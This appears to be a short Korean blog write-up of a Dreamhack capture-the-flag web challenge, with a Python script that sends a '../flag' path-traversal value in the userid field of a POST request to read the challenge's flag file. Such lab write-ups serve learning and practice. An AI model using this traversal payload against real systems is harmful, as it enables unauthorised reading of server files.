userid에 ../flag를 넣어서 pathtraversal 취약점을 이용하려고 했는데 안된다.
값이 넘어갈 때 flag를 포함하면 undefined로 처리되어서 넘어가는 것 같다.
import requests
url="http://host3.dreamhack.games:8821/get_info"
data={"userid":"../flag"}
res=requests.post(url=url, data=data)
print(res.text)
이렇게 공격 코드를 짜서 실행하면
flag가 나온다.
'웹해킹' 카테고리의 다른 글
드림핵 web-misconf-1 롸업 (0) | 2023.12.22 |
---|---|
드림핵 session 롸업 (1) | 2023.12.20 |
드림핵 simple-web-request 롸업 (0) | 2023.12.20 |
드림핵 ex-reg-ex 롸업 (0) | 2023.12.20 |
드림핵 Flying Chars 롸업 (0) | 2023.12.20 |